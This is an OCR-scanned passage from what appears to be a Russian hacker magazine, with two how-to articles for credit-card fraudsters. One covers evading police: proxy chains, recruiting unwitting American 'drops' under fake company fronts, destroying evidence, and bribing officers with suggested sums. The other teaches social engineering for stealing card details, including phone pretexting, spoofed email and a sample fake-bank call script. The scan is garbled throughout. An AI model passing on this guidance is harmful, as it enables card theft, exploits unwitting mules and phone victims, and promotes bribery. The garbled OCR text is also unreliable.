или поздно придут за тобой, а ты, так 
как вовремя не позаботился о своей 
безопасности. 


ЧТОБ НЕ ОСТАТЬСЯ 
В ДУРАКАХ, ЧИТАЙ 
ВНИМАТЕЛЬНО УК 

Многие ньюбисы, которые втяги- 
ваются в кардинг, настолько загора- 
ются идеей сорвать халявный куш, 
что забывают о правовой стороне 
своих дел. Ведь все эти скарженные 
плееры и диски, ноутбуки и нал не с 
луны падают. Они чьи-то, и ты их не 
подобрал на улице, а именно украл. А 
воровство уголовно наказуемо, так 
даже в УК написано. Этим самым УК 
будут руководствоваться дяди в пого- 
нах, когда придут забрать тебя от ма- 
мы с папой в тюрьму. И этот самый УК 
ты должен выучить как свои пять 
пальцев, чтобы знать, на сколько вре- 
мени родители могут лишиться сына, 
если сынуля наломает дров. 


Основные статьи, на которые ты дол- 
жен обратить внимание, это 159 (мо- 
шенничество), 165 (причинение иму- 
щественного ущерба путем обмана 
или злоупотребления доверием), 174 
(отмывание денежных средств или 
иного имущества, приобретенных gpy- 
гими лицами преступным путем), 175 
(приобретение или сбыт имущества, 
заведомо добытого преступным пу- 
тем), 186 (изготовление или сбыт под- 
дельных денег или ценных бумаг), 187 
(изготовление или сбыт поддельных 
кредитных, либо расчетных карт и 
иных платежных документов), 272 
(неправомерный доступ к компьютер- 
ной информации) и 273 (создание, ис- 
пользование и распространение вре- 
доносных программ для ЭВМ). Ска- 
чать текст УК ты можешь по адресу 


Вообще, прежде чем лезть "в бой", ос- 
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новательно разузнай и осознай, куда 
именно ты лезешь. Чтобы после счаст- 
ливых улыбок от успешно скарженно- 
го добра не было слез недоумения, че- 
го это варуг какие-то злые дяди хотят 
лишить тебя свободы. 


ЧЕМ МЕНЬШЕ ГОВОРИТЬ 
ТЫ БУДЕШЬ, ТЕМ МЕНЬШЕ 
ВЕРОЯТНОСТЬ, ЧТО СЕБЯ 
ПОГУБИШЬ 

Если, несмотря на все ужасы, опи- 
санные в УК, ты все-таки решился на 
ответственный шаг, запомни простое, 
но важное правило: "Молчание - 30- 
лото". Конечно, хочется похвастаться 
перед кентами своей элитностью и ха- 
лявным добром. Рассказать Вовану, 
как круто ты надул узбека из Амери- 
ки. Но где гарантии, что Вова не ска- 
жет Пете, а Петя из зависти - майору 
милиции Козлову? Не думай, что твой 
напарник, с которым вы проворачива- 
ете дела уже несколько месяцев и 
болтаете целыми днями по аське, не 
заложит тебя, если его прижучат. Во 
время допросов и обработки ментами 
он будет думать не о тебе и вашей 
дружбе, а о своей шкуре и свободе. И 
даже ближайших родственников, в 
которых ты полностью уверен, не сто- 
ит посвящать в тонкости своей рабо- 
ты. Они могут случайно сболтнуть 
лишнего, а отсиживать придется тебе. 


— 
После вливания в кардерский бизнес \^ 
твои связи должны разделиться на 
личные и деловые. Те, с кем ты во- 
дишь дружбу и любовь, не должны 
ничего знать о делах, а те, с кем ты 
делаешь дела и деньги (другие карде- 
ры), пусть остаются в неведении отно- 
сительно твоей реальной жизни. 
Иеще. Если, помимо кардинга, ты юза- 
ешь всякие чаты и любишь покрасо- 
ваться на форумах, не сиди везде под 
одним ником. "Рабочий" ник не дол- | 
жен больше нигде светиться. Бывает, \ 
посмотришь, вроде солидный человек, 
гроза кред и дропов, а введешь ник- \ 
нейм в уа.ги, и на первой же свалив- ' 
шейся паге читаешь объявку пятилет- 
ней давности: "Молодой и красивый, 
познакомлюсь с молодой и красивой", 
а внизу актуальный телефон. 


ПРОКСИ - ЛУЧШАЯ ЗАЩИТА, 
ЮЗАИ ЕЕ, И ТЫ - ЭЛИТА 

Так как большинство кардерских 
операций сейчас осуществляется че- 
рез Сеть, то пора подумать, как бы 
прикрыть свою задницу, блуждая по 
инету. В этом деле лучшим другом для 
кардеров являются прокси-серверы. 
Далеко не каждый прокси обеспечи- 
вает полную анонимность. Некоторые 
из них, хоть и являются посредниками 
между твоим компом и атакуемой 


жертвой, настоящего адреса He скры- 

Bait. Другие оставляют информацию 

’ 06 использовании прокси. А учитывая 

| то, что не все ресурсы позволяют зай- 
ти под проксей, и не все юзвери дове- 

| PALOT ныкающимся за проксями пар- 

| HAM - 3TO не есть гуд. Посмотреть, ви- 

„ дитли сервак твою проксю, можно 

| здесь - www.all-nettools.com/pr.htm. 


Поэтому наш выбор - анонимные 
прокси. Они не оставляют никакой 
лишней инсрормации и хорошо справ- 
ляются со своей основной срункцией - 
обеспечением анонимности. Большой 
список анонимных проксей можно 
найти на kiev-security.org.ua/box/al/2.shtml, 
или пошарься по netspy.ukrpack.net. 
На кардерпланете за 60 ВМ в месяц 
предлагают купить доступ к сотням 
быстрых анонимных проксей (или к 
500K за 300 зеленых). Если есть 
лишние деньги, советую воспользо- 
ваться этим предложением, так как 
приватные серваки в любом случае 
лучше публичных. Проверить прокси- 


своей безопасности, нужно, чтобы у те- 

| бя под проксей бегали не только Opera 
(IE), но и В С-клиент, сртп-клиент и даже 
аська. Для удобства работы и настройки 
советую скачать занятную программу 
Anonimity4Proxy 
(http://crOaker.tiraet.com/cgi-bin/topdl/down- 
load.pl?file=i28), В ней предусмотрены 
настройки прокси-соединений через лю- 
бые порты, возможность автозамены 
серваков через какое-то время, воз- 
MOMHOCTb отключить недоступные из 
браузера сфункции, оставляющие сле- 
ды в Сети, и другие полезные сфичи. 
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| Если ты проворачиваешь простень- 
кое дельце, к примеру, пытаешься 
| спионерить Mp3-nneep, TO одного ано- 
нимного прокси будет вполне доста- 
точно. Но если оборот твоего бизнеса 
составляет десятки тысяч долларов, 
федералы легко могут запросить ин- 
формацию с прокси, под которым ты 
проказничал, и хозяину сервака, хо- 
чешь не хочешь, придется заглянуть 
в логи и отыскать твой реальный IP. 
Чтобы усложнить задачу людям в 
черном, нужно создать цепочку прок- 
си-соединений. При этом ты сначала 
соединяешься с одним прокси-серва- 
ком, потом с него заходишь на второй, 
со второго на третий и затем, через 
все эти узлы, соединяешься с нужным 
тебе компом. Связь при этом, мягко 
говоря, немного ухудшается, но твоя 
безопасность повышается многократ- 
но. Теоретически цепочки из трех 
проксей достаточно, чтобы тебя не 
нашли, хотя гарантий никаких нет. Ма- 
ло ли что ты натворишь, и насколько 
серьезно за тобой будут охотиться. 
Для удобной работы с цепочками 
проксей скачай программу SocksChain 
(www.ufasoft.com/files/sockschain_setup.exe). 


ate 


И, конечно же, не забывай про cpaep- 
вол, который должен быть у тебя на 
посту 24 часа в сутки и закрывать как 
можно больше портов. Подобных 
программ много, я могу посоветовать 
установить Outpost Firewall, который 
уже давно отлично себя зарекоменодо- 
вал. Утягивай его с 
www.agnitum.com/products/outpost. 


КОЛЛЕГ СВОИХ HE КИДАЙ, 
КИНУТЬ СЕБЯ HE ПОЗВОЛЯЙ 

и Несмотря на то, что сам кардинг 
подразумевает обман других людей 
(практически всегда буржуев), внутри 
кардерского сообщества люби, кида- 
ющие "своих", вызывают только 
презрение. Их списки ведутся на кар- 
дерпланете на своеобразной доске 
позора, и называют их либо Дятлами, 
либо Scum of Society (отбросы обще- 
ства). Тем не менее, количество их не 
убывает. Все время находятся особо 
хитрожопые индивидуумы, которые 
не заморачиваются принятым в среде 
этикетом (в сообществе кардеров 
есть свои правила поведения) и руко- 
водствуются только одной целью - 
срубить побольше бабла. Среди нес- 
кольких тысяч читателей форума 
www.carderplanet.net встречаются ge- 
сятки подобных кидал. Всех их можно 
поделить на три категории: новички, 
любители и просри. 


У первых тактика проста как две ко- 
пейки - они предлагают срорумянам 
товар или сервис, который у них яко- 
бы есть, требуют предоплату, а когда 
получают деньги, попросту прекраща- 
ют отвечать на мыло/аську. Как пра- 
вило, парни из этой категории слабо 
разбираются в вопросах кардинга и 
на форуме имеют статус ньюбиса 
(или вообще ипгед$егеа). В разгово- 
ре отдают предпочтение обсуждению 
размеров и способа перевода оплаты, 
а не описанию предоставляемых YC- 
луг. Внимательному человеку будет 
нетрудно определить такого рода ки- 
gany, предварительно пообщавшись 
с ним некоторое время по аське. 


Представители второй категории более 
подкованы в кидании коллег по ремес- 
лу. Вначале они зарекомендовывают 
себя на сроруме, честно предоставляя 
клиентам товар, завоевывая доверие 
остальных кардеров. Но со временем, 
когда заказы становятся уже более 
серьезными, качество услуг постепен- 
HO сходит на нет. И когда народ перес- 
тает верить отмазкам, кидала сматыва- 
ет удочки и просто исчезает. Правда, 
только для того, чтобы вскоре снова 
появиться, но уже под другим ником. 


Профессиональные кидалы по cnoco- 
бам заработка схожи со своими кол- 
легами из второй категории, но име- 
ют намного больший опыт, а развод 
CDOPYMSH - их постоянная и часто 
единственная работа. Эти парни уже 


долгое время тусуются в кардерской 
среде, знают всех инсайдеров и пра- 
вила, умеют найти подход к каждому, 
даже самому мнительному клиенту 
(хотя предпочтение отдают обычно 
ньюбисам). Из-за хорошей осведом- 
ленности проси в кардинге, а также 
их осторожности, определить в них 
кидалу нелегко. 


Лучшим советом тут будет остерегать- 
ся иметь дело с малознакомыми 
людьми. Форумяне обычно оставляют 
отзывы о качестве предоставляемых 
услуг, и прежде чем выходить с чело- 
веком на связь, внимательно почитай, 
что о нем говорят другие. Хорошую 
защиту от кидал дает гарант-сервис, 
то есть третья сторона, чей авторитет 
не подлежит сомнению, и через кото- 
рую осуществляется сделка. Если че- 
ловек согласен на такой вариант, это 
уже о чем-то говорит. Неплохо бы об- 
ращать также внимание на статус 
пользователя. Хотя членство в "veri- 
fied" не дает стопроцентную гаран- 
тию, процент кидал среди них ниже, 
чем среди каких-нибудь "newbie". 


Никогда не спеши высылать деньги. 
Креды, приватные прокси, полезная 
информация - это все, конечно, хоро- 
шо, но потрудись сначала пообщать- 
ся сих продавцом. Всегда старайся 
договориться об оплате после полу- 
чения товара или хотя бы об авансо- 
вой оплате (вперед платится неболь- 
шая часть денег, а если все пройдет 
нормально, остальные деньги досыла- 
ются). Ну, а если уже кинули, сообщи 
06 этом на сфоруме, чтобы кидала не 
разбогател на еще большую сумму. 


И последнее - не советую тебе самому 
становиться на этот путь. Гораздо 
большую пользу ты принесешь себе, 
если заработаешь уважение среди 
кардеров, чем если будешь размени- 
ваться на мелочевку, кидая ньюби- 
сов. Людей, которые кидают своих, не- 
редко ищут и довольно жестоко нака- 
зывают. Если уж хочешь кого-то ки- 
нуть, проворачивай свои делишки с 
буржуями. Они и побогаче, и живут 
намного дальше. 


ищи только 
ХОРОШИХ ДРОПОВ 

m Как известно, в кардинге очень 
важную роль играют gponbl - подс- 
тавные лица, через которых ты обна- 
личиваешь украденные деньги или 
получаешь товар, скарженный в он- 
лайновых магазинах. За свою по- 
мощь дроп получает денежное воз- 
награждение, и, так как все добро 
сначала приходит на его домашний 
адрес, именно он будет отвечать пе- 
ред ментами в случае чего. Хорошего 
дропа найти не так уж легко. В Аме- 
рике (а именно там должно прожи- 
вать подставное лицо) тоже немало 
жадных, нечестных людей. И шанс, 
что дроп предпочтет оставить товар 


Чтобы ус- 
ложнить за- 


дачу людям 
в черном, 
нужно соз- 
дать цепоч- 
ку прокси- 
соединений. 
При этом 
ты сначала 
соединя- 
ешься с Og- 
ним прокси- 
серваком, 
потом с не- 
го заходишь 
на второй, 
со второго 
на третий и 
затем, че- 
рез все эти 
узлы, сое- 
диняешься 
с нужным 
тебе ком- 
пом. 


Профессио- 
нальные ки- 
далы по 
способам 
заработка 
схожи со 
своими кол- 
легами из 
второй ка- 
тегории, но 
имеют нам- 
ного боль- 
ший опыт, а 
развод фо- 
румян - их 
постоянная 
и часто 
единствен- 
ная работа. 


настал 


роковой миг, 
когда в дверь 


тарабанят с 
грозным 
воплем: 
"Откройте, 
милиция!" 
не паникуй, 
переходи к 
плану Б :). 
На тему 
общения с 
ментами 
написано go 
фига статей 
(например, 
на WWW. 
prison.org). 


Если прики- 
нешься веч- 
ноголодным 
студентом, 
можно стор- 
говаться и 
подешевле. 


Договориться 


практически 
всегда мож- 
но. Менты в 
этом плане 
люди пони- 
мающие :). 


КАК НЕ СЕСТЬ НА НАРЫ ) 


себе вместо сомнительного сотрудни- 
чества, достаточно велик. Поэтому к 
поиску и работе с дропами нужно 
подходить с умом. 


В принципе, практически каждый аме- 
риканец с низким или средним достат- 
ком является потенциальным дропом. 
Хороший способ найти людей - аська 
со своими white рад'ами или форумы, 
где ищут работу (их в англонете мил- 
лион). Если у тебя туго с английским, 
можешь поискать среди жителей 
США наших эмигрантов, хотя выгод- 
нее работать именно с коренными 
буржуями. Навешать лапши русскому 
- это не то же самое, что задурить 
америкоса. Чтобы дроп повелся на 
твое предложение, нужно создать ви- 
димость того, что ты представитель 
солидной развивающейся сфирмы, где 
есть свой штат сотрудников, сайт, 
фирменные мыльники и подобная 

> ерунда. Стиль писем должен быть со- 
ответствующий - официально-дело- 
вой, по которому видно, как сфирма 
ценит каждого клиента. 


Когда на твое предложение откликнет- 
ся народ, расскажи заготовленную за- 
ранее легенду о том, как вы уже давно 
и успешно сотрудничаете с западом и 
перепродаете тамошнюю продукцию. 
Что тебе нужны люби, готовые полу- 
чать и пересылать товары, зарабаты- 
вая на этом деньги. Или, если тебе 
нужно обналичить доллары, другую 
легенду (придумай уж сам). Первое 
время работы с дропом проверяй его. 
Не присылай ему дорогих товаров, не 
проси обналичить крупную сумму. 
Только когда увидишь, что человек 
выполняет свою работу честно и без 
задержек, раскручивай его дальше. 
Постарайся выведать об этом челове- 
ке максимум инорормации, а также пос- 
тоянно держи его на связи. Если он бу- 
дет чувствовать свою востребован- 
ность и регулярно получать обещан- 
ное вознаграждение, у него и мысли не 
возникнет тебя кинуть. А чтобы все 
было вообще замечательно, потрудись 
соорудить контракт, проставить "фир- 
менные" подписи и печати и выслать 
сраксом. Это создаст иллюзию легаль- 
ности дела, а когда американская мен- 
тура постучится к посреднику в дверь 
(а это обязательно произойдет через 
несколько месяцев), у того будет ка- 
кое-никакое доказательство своей неп- 
ричастности к инциденту. 


Несмотря на то, что работать 
с непосвященными дропами 
дешевле и удобнее, иногда 
имеет смысл воспользовать- 
ся услугами профессиона- 
лов. Это люди, которые зна- 
ют, что товар и деньги - гряз- 
ные. И сознательно берут на 
себя ответственность за все 
махинации. Естественно, за 
немаленький процент (обыч- 
но половину суммы). На cpo- 
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руме кардерпланета можно найти лю- 
дей, которые всегда готовы обнали- 
чить деньги или принять товар. Мож- 
но воспользоваться также услугами 
зарубежных контор, которые обнали- 
чивают деньги в системе E-Gold (их 
список можно найти Ha WWW .golddirecto- 
ry.com/e-gold.htm). В любом случае, за- 
нимаясь кардингом, всегда действуй 
через подставных лиц. Нигде и никог- 
да не указывай свой настоящий ag- 
рес. Его также не должны знать сами 
дропы, с которыми ты работаешь, и 
дополнительные посредники, через 
которых ты, возможно, контактиру- 
ешь с дропами. А если у "партнеров" 
появятся вопросы относительно тебя 
- смело ври. Причем ври так, чтобы 
это было невозможно проверить :). 


ЧТОБ НЕ РУГАТЬСЯ ПОТОМ 
МАТОМ, СЖИГАЙ ЛЮБЫЕ 
КОМПРОМАТЫ 

и За время тяжкой работы по зараба- 
тыванию чужих денег у тебя постепен- 
но будет скапливаться полезное добро: 
номера кред, пароли и прочие радости, 
которые ты будешь называть "своим 
сокровищем". Для людей в серых ши- 
нелях эти же вещи проходят под назва- 
нием "улики". И об этих самых уликах 
тебе нужно позаботиться загодя. 


Во-первых, если у тебя не стоит РСР, 
скачай эту нужную программу с сайта 
WWW.9Gp.cOM и закриптуй свой винт так, 
чтобы самому страшно от такой защи- 
ты стало. 


Во-вторых, отучи себя от вредной 
привычки записывать деловую ин- 
формацию Ha огрызках бумаги и бро- 
сать их где попало. Если придут мен- 
ты и найдут под диваном обрывок бу- 
мажки с давно заюзанными кредами, 
тебе останется только кусать покти и 
смотреть, как эта шпаргалка гробит 
твою жизнь. Никакой компрометирую- 
щей информации не должно быть ни 
на мобиле, ни на КПК, ни на дискетах, 
заныканных глубоко в очке. Все на 
компе, все в зашифрованном виде. А 
если нужно срочно удалить особо 
компрометирующее срайло, юзай 
программу Kremlin (www.kremlinen- 
crypt.com), которая стирает так, что 
никакой ипегазег не поможет. 


Матерые кардеры рекомендуют также 
использовать виртуальный писюк. 
Вкратце это программа, которая соз- 
дает на винте образ нового компьюте- 
ра, и работать с ним можно, как если 
бы к тебе по сетке была подключена 
другая машина. Вначале "винчестер" 
эмулируемой тачки девственно чист, и 
на него можно установить любую ОС, 
любые программы. У VirtualPC есть 
одна очень полезная сфича, которая 
вносит эту вещь в разряд "must have" 
для каждого уважающего себя карде- 
ра. На виртуальном компе можно за- 
пускать любые приложения, серфить 
по любым сетевым джунглям и вооб-. 


ee 


ще творить что угодно. Все это Bpe- 
менно будет сохраняться на фейк- 
винте, но достаточно завершить се- 
анс, клацнуть "отказ от сохранения", 
и вся информация о твоих последних 
перемещениях будет удалена. Вирту- 
альный комп примет тот вид, который 
имел во время включения. Скачать 
это чудо можно с WiWW./nicrosoft.com/win- 
dowsxp/virtualpc. 


ПОПАЛ К MEHTAM - 
НЕ ОБЕССУДЬ, А ДЕНЕЖКУ 
ДЛЯ НИХ ДОБУДЬ 

m Несмотря на всю немереную ано 
нимность, которой ты себя окружил, 
стопроцентных гарантий, что ты не по- 
падешь в лапы ментов, тебе не даст „- 
никто. И уж если настал роковой миг, 
когда в дверь тарабанят с грозным 
воплем: "Откройте, милиция!", не па- 
никуй, переходи к плану Б :). На тему 
общения с ментами написано go фига 
статей, например, неплохую подборку 
материалов можно найти на 
www.prison.org. Главное, что ты дол- 
жен запомнить, менты - это лживые, 
заискивающие и хитрые существа. И 
не друзья они тебе, а враги заклятые. 
Они будут сулить тебе свободу в об- 
мен на чистосердечное признание, 
убеждать, что чем больше скажешь, 
тем меньше отсидишь. Но ты не ве- 
дись, на самом деле все с точностью 
наоборот. Ты им по сфигу, им нормати- 
вы надо выполнить, посадить аккурат 
столько рож, за сколько премию да- 
ют. Так что держись мужественно и 
на все вопросы следователя отвечай: 
"Дяденька, вы что, да я даже терми- 
нов таких не знаю". Чем больше ты 
скажешь, чем больше подпишешь, 
тем ярче и длиннее будет твоя жизнь 
на зоне. Лучше промолчать и три дня 
отоспаться в обезьяннике, чем пого- 
ворить по душам с "добрым" опером и 
потом 3 года хлебать баланоду. 


Кстати, ты в курсе, что менты, хоть все 
из себя и неподкупные, но кушать то- 
же хотят. И вряд ли откажутся, если 
ты сделаешь финансовый вклад в 
фонд развития их семей. А за это они 
по дружбе закроют твое geno и отпус- 
тят с миром. На лапу давать лучше 
всего сразу, потому что когда дело 
дойдет до прокуратуры, отмазаться 
будет намного сложнее (или дороже). 
Тарифы варьируются от 200 go 2 ты- 
сяч баксов, в зависимости от тяжести 
твоего проступка, качества компрома- 
та на тебя и жадности ментов. В cpeg- 
нем баксов 500, думаю, должно хва- 
тить. Если прикинешься вечноголод- 
ным студентом, можно сторговаться и 
подешевле. Договориться практичес- 
ки всегда можно. Менты в этом плане 
люди понимающие :). 


Более подробно обо всем можно про- 
читать на форуме 1 {p:///orum.carderplan- 
еле! в разделе "Безопасность". 


ГИПНОЗ - ЭТО ПРОСТО \ 


Головин Виталий Vint@townnet.ru 


ГИПНОЗ 
= ЭТО ПРОСТО 


СОЦИАЛЬНАЯ ИНЖЕНЕРИЯ ДЛЯ КАРДЕРА 


ь. 


3 тот раздел кардерского искусства очень важен. Большинство взломов происходит не без помощи социальной 
инженерии, и именно она подчас определяет провал или успех операции. Собственно, для некоторых операций 
социальная инженерия - единственное, что нужно для их осуществления. 


ЧТО ЗА ЗМЕЙ СИ 


и Социальная инже- 


нерия (Social 


Социальная 
инженерия 
(Social 
Engineering) 
= это наука, 
с помощью 
которой 
происходит 
управление 
людьми 
против их 
воли и же- 
лания. 


Излюблен- 
ные орудия 
и способы 
кардеров, 
проводящих 
такие ата- 
ки, широко 
известны: 
телефоны, 
как обыч- 
ные, так и 
сотовые, 
личные 
встречи с 
жертвой, 
письмо - 
обычное бу- 
мажное или 
послание по 
мылу, раз- 
личные ча- 
ты в сети 
(ICQ, IRC, 
банальный 
web-chat). 


Engineering) - это наука, 
с помощью которой 
происходит управление людьми про- 
тив их воли и желания. Она была 
изобретена сфрикерами уже довольно 
давно: лет двадцать - тридцать назад. 
Кстати, очень известными специалис- 
тами СИ были Кевин Митник и Росско. 
В этой статье будет использоваться 
толкование, относящееся исключи- 
тельно к компьютерной безопасности. 
То есть сейчас СИ - это способ неле- 
гального доступа к секретной или 
личной информации путем обмана 
людей. Неброско, зато ясно. Обычно 
цель атаки СИ одна - получить па- 
роль, необходимый для доступа к ка- 
кой-либо секретной базе данных, в 
последнее время целью СИ часто яв- 
ляется номер кредитки незадачливо- 
го юзера. 


Простейшая СИ атака делится на 3 
фазы: диверсия, реклама, помошь. С 
диверсией все просто, кардер-хакер 
просто нарушает работу компьютера 
жертвы любым способом. Это может 
быть как банальный вирус на дискете 
или в письме, так и хорошая атака на 
хост из Сети. После того, как комп заг- 
нулся, наступает второй этап взлома: 
реклама. Здесь кардер информирует 
жертву всеми доступными средствами 
(бумажные объявления, общие 
друзья, ICQ, спам), что именно OH смо- 
жет вернуть к жизни безвременно 
скончавшуюся ОС. И только следую- 
щим шагом становится Henocpeg- 
ственно помощь. Под "помощью" кар- 
деры понимают восстановление 
компьютера, в ходе которого происхо- 
дит незаметное для юзера выманива- 
ние из него необходимой иноры. О 
способах помощи мы поговорим чуть 
НИЖе, а сейчас рассмотрим места, где 
обычно проводятся атаки класса СИ. 


ЗНАЛ БЫ, ГДЕ УПАДЕШЬ... 
и Излюбленные орудия и способы 

кардеров, проводящих такие атаки, 

широко известны: телефоны, как 
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обычные, так и сотовые, личные встре- 
чи с жертвой, письмо - обычное бу- 
мажное или послание по мылу, раз- 
личные чаты в сети (ICQ, IRC, баналь- 
ный web-chat). Дальше я постараюсь 
изложить основные тонкости каждого. 


ТЕЛЕФОН - СРЕДСТВО 
КАРДЕРА 

m Начнем, пожалуй, с самого старо- 
го, но и сейчас активно используемо- 
го способа: общение с жертвой по те- 
лефону. 

Вот основные плюсы такого метода: 

Ф. Достаточно высокая аноним- 
ность, особенно при использовании 
левой линии с антиАОНом или звонка 
с таксосрона. 

@. Высокая эффективность, кото- 
рая объясняется возможностью 
представиться любым человеком, и, 
при наличии навыков, атакуемый не 
заметит подвоха. 

@. Быстрые результаты - кардеру не 
нужно ждать, пока дойдет письмо или 
вернется инет, упавший из-за грозы. 
При использовании мобильника мы 
получаем полную свободу, что нема- 
ловажно в трудовые будни. На этом 
плюсы социальной инженерии с ис- 
пользованием телефона заканчива- 
ются и начинаются отрицательные 
стороны. 

Самая большая проблема - это твой 
голос, особенно если человек на gpy- 
гом конце провода хорошо знает того, 
за кого себя выдает взломщик (к при- 
меру, менеджера банка Х). Встает не- 
обходимость смены голоса любыми 
способами. Если не получается подоб- 
рать тон, то атакующий часто пытает- 
ся сослаться на болезнь (хотя я сом- 
неваюсь, что здоровый еще час назад 
человек может воруг заболеть парин- 
гитом с полной потерей голоса). Даль- 
ше стоит проблема срона - в любой 
организации добиться абсолютной ти- 
шины невозможно, а особенно в бан- 
ках (я так часто говорю про банки по- 
тому, что кардеры чаще выдают себя 
за высокопоставленных служащих 
банка атакуемого). И значит, если нек- 
то позвонит в разгар рабочего дня и в 
его "осрисе" будет стоять гробовая ти- 


шина, то кардеру не поверят или за- 
подозрят неладное. Значит, необходи- 
мо применить одну из следующих 
уловок: телефонный аппарат, генери- 
рующий шум офиса, запись из реаль- 
ного рабочего офиса или трансляция 
посредством радиожучков из другой 
организации (выбирается предельно 
тщательно). С технической стороной 
этого способа мы познакомились, пе- 
реходим к самому радикальному и 
опасному - личная встреча. 


CONNECT ОМ ТЕТ-А-ТЕТ! 

m У встречи с жертвой, так сказать, 
тет-а-тет есть как явные недостатки, 
так и явные преимущества. К недос- 
таткам относится то, что кардера, воз- 
можно, запомнят, следовательно он 
должен найти время и очень тщатель- 
но подготовиться - начиная с одежды 
и заканчивая прической, все должно 
соответствовать имиджу делового 
респектабельного человека (вряд ли 
лохматый и небритый голодранац мо- 
жет внушить доверие). Как ты пони- 


маешь, из этого следуют и проблемы 
с поведением - кардер должен контро- 
лировать свои эмоции и вести разго- 
вор на "правильном" языке, не исполь- 
зуя сленга, эффект от которого прямо 
противоположный. 

Расстояние также играет немаловаж- 
ную роль - при атаке с помощью теле- 
фона взломщик может находиться за 
тысячи километров от жертвы и до- 
биться результатов без проблем, а для 
встречи ему придется приехать в город 
атакуемого. Несмотря на эти недостат- 
ки, СИ во время личной встречи не спе- 
шит сдавать позиции, поскольку спо- 
соб этот не лишен достоинств - во вре- 
мя общения Kapgep видит человека, а 
значит, легко поймет, верит он ему или 
нет. Это позволяет моментально кор- 
ректировать тактику атаки. Проффессио- 
нальные кардеры имеют в запасе мно- 
жество мелких психологических прие- 
мов (с некоторыми можешь познако- 
миться BO врезке), которые резко по- 
вышают эффективность их труда. А 
истинные гуру не только имеют за пле- 
чами психологическую подготовку, но 
и владеют приемами гипноза, что поз- 
воляет им добиться практически стоп- 
роцентной эсрорективности, не остав- 
ляя следов. Этот способ оправдывает 
себя, только если человек имеет нема- 
лый опыт убеждения людей или владе- 
ет спецподготовкой (тут рулят психоло- 
ги и психиатры). 


Дальше я расскажу тебе о способах, 
появившихся совсем недавно, но уже 
получивших немалое распростране- 
ние. Открывает наш мини-обзор инет- 
средств СИ простая электронная поч- 
та. Именно с помощью посланий по е- 
mail проводятся многие атаки, направ- 
ленные на получение не только твоей 
креды, но и личной инфы более ин- 
тимного характера. Я бы сказал даже, 
что большинство таких атак проведе- 
но именно с помощью электронной 
почты, поскольку она позволяет без 
проблем обрабатывать несколько че- 
ловек одновременно. 


СЕТЬ НАМ КАРДИТЬ И ЖИТЬ 
ПОМОГАЕТ 

m В сущности, такая атака довольно 
проста - кардер переписывается с 


жертвой с левого почтового ящика и 
пытается выудить нужную инофу. При 
всей простоте проведения, необходи- 
мо учитывать некоторые тонкости, 
связанные с почтовой программой и 
заголовками письма. Так, сначала 
следует узнать, каким почтовиком 
пользуется человек, за которого 
взломщик выдает себя. Для этого 
достаточно получить от жертвы лю- 
бую мессагу и, заглянув в заголовки 
(в аутлуке - "свойства письма", в бате 
- "РО", а в kmail жми Ha V), выяснить 
значение поля X-Mailer. Еще надо пос- 
тараться, чтобы заголовки письма не 
содержали инфы, которая может вы- 
дать атакующего с потрохами. И хотя 
обычные люди вряд ли станут прове- 
рять, откуда пришло письмо, страхов- 
ка еще никому не мешала. Итак, ос- 
новная проблема - [Р-адрес отправи- 
теля мессаги. Именно с его помощью 
были пойманы первые начинающие 
кардеры. Для того чтобы не оказаться 
в их числе, при отправке своих посла- 
ний кардеры юзают один из следую- 
щих способов. Первый состоит в 
простой перенастройке своего почто- 
вика на другое имя и другой сервак, 
лучше применить систему профилей 
для каждой жертвы, чтобы не лезть 
каждый раз в настройки. Второй спо- 
соб также несложен - найти програм- 
му, которая позволяет самому запол- 
нять служебные поля, но здесь кар- 
дер старается всеми способами полу- 
чить доступ к реальному почтовому 


Один из инженеров твоей души. 
Занимается в основном онлайн- 
инженерингом 


ОФИЦИАЛЬНЫЙ САЙТ КАРДЕРОВ. 


МИФ ИЛИ РЕАЛЬНОСТЬ? 


Ш Уже очень давно анонсиру- 
ют "официальный" сайт рус- 
ских кардеров - www.carder.ru. 


Но он в офлайне, хотя я уже 
видел ссылки на статьи с него. 
Больше недели я пытался зай- 
ти, но тщетно. 


www.carder.ru 


серверу подставляемого чела. А BOT 
третий гарантирует очень высокую 
эффективность, правда, с некоторы- 
ми затратами мозговых ресурсов кар- 
дера. Для выполнения диверсии сле- 
дует с помощью простого терминала 
(стандартный от виндов подойдет на 
100%) подключиться к серверу SMTP 
на 25 порт и продиктовать все поля с 
терминала. Помогают также и проги, 
типа Anonymity Mailer, позволяющие 
отправлять почту от любого имени 
(например, Dush@witenouse.org). 


/DEV/HANDS AND /DEV/M0ZG 
В БОЙ! 

и Теперь перейдем к тому, как все- 
таки в реальной жизни используется 
СИ атака. Первый распространенный 
способ - это звонок по телесфону, в 
результате которого происходит при- 
мерно такой диалог между кардером и 
жертвой: 


-Кардер: Здравствуйте, это Васипий 
Лохов? 

-Жертва: Да. 

-К; Я - Иван Иванов, менеджер отдела 
по работе с пластиковыми картами 
банка Ч. Вчера нам пришел запрос на 
перевод $1053 с вашего счета на счет 
интернет-магазина, который числится 
у нас в черном списке (больше воды 
и крутизны). Наш банк очень беспо- 
коится за своих клиентов, и поэтому 
просим подтвердить передачу денег. 
-№: А... У... Я... Я ничего не покупал... 
-K: Хм. Странная ситуация. Вы никому 
не сообщали номер своей кредитной 
карты? 

-Ж; Нет. 

-K: Тогда, возможно, это ошибка на- 
шего программного обеспечения... 
только 3 дня назад перешли на новую 
версию (банк крут, шагает в ногу со 
временем). Назовите номер вашей 
карты и дату окончания действия, мы 
сверим и сообщим результат. Если 
это ошибка с нашей стороны, то ваш 
счет будет восстановлен. 

-M: Сейчас-сейчас. 987654321 01/04. 
-K: Спасибо, сейчас будет проведена 
проверка. В течение 2 часов не про- 
водите платежных операций с пласти- 


ковой картой нашего банка. До свида-» 


НИЯ! 
-Ж; До свидания. 


Это лох в исполнении Crug'a. Если не 
хочешь быть на него похожим, никому 
не верь в Сети 


Как ты по- 
нимаешь, из 
этого сле- 
дуют и 
проблемы с 
поведением 
- кардер 
должен 
контролиро- 
вать свои 
эмоции и 
вести раз- 
говор на 
"правиль- 
HOM" языке, 
не исполь- 
зуя сленга. 


гипнотичес- 
кой способ- 
ностью об- 
ладают все 
люди, осо- 
бенно с 
сильной во- 
лей, поэто- 
му, если ты 
пытаешься 
убедить че- 
ловека, ста- 
райся смот- 
реть ему в 
переносицу 
и думать, о 
чем гово- 
ришь. 


Доказывая 
свою право- 
ту, исполь- 
зуй только 
факты и те- 
зисы, кото- 
рые может 
понять объ- 
ект. 


ГИПНОЗ - ЭТО ПРОСТО \ 


Китайский кардер 


